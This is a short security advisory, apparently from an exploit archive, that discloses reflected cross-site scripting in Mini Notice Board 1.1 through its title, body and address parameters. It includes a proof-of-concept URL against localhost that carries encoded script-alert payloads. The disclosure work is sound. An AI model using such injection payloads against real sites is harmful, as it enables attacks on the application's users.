Mini Notice Board 1.1 Cross Site Scripting

2016.11.02

Credit: N_A

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

mininoticeboard_v1.1 XSS Vulnerabilities
=========================================
Discovered by N_A, N_A[at]tutanota.com
=======================================
Vendor has been notified
Description
============
Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car
or lawnmower or want to provide services, they can simply write a card.
It supports unlimited Regions.
https://sourceforge.net/projects/mininoticeboard
Vulnerabilities
================
XSS attacks can be executed via the GET method.
Vulnerable variables are:
title, body and address.
POC Exploit String
====================
http://127.0.0.1/mininoticeboard/addcard.php?title=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&body=%3Cscript%3Ealert%28%272%27%29%3B%3C%2Fscript%3E&tel=555&contact=pentest&address=%3Cscript%3Ealert%28%273%27%29%3B%3C%2Fscript%3E&submit=Add+Card
Email
======
N_A[at]tutanota.com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mini Notice Board 1.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.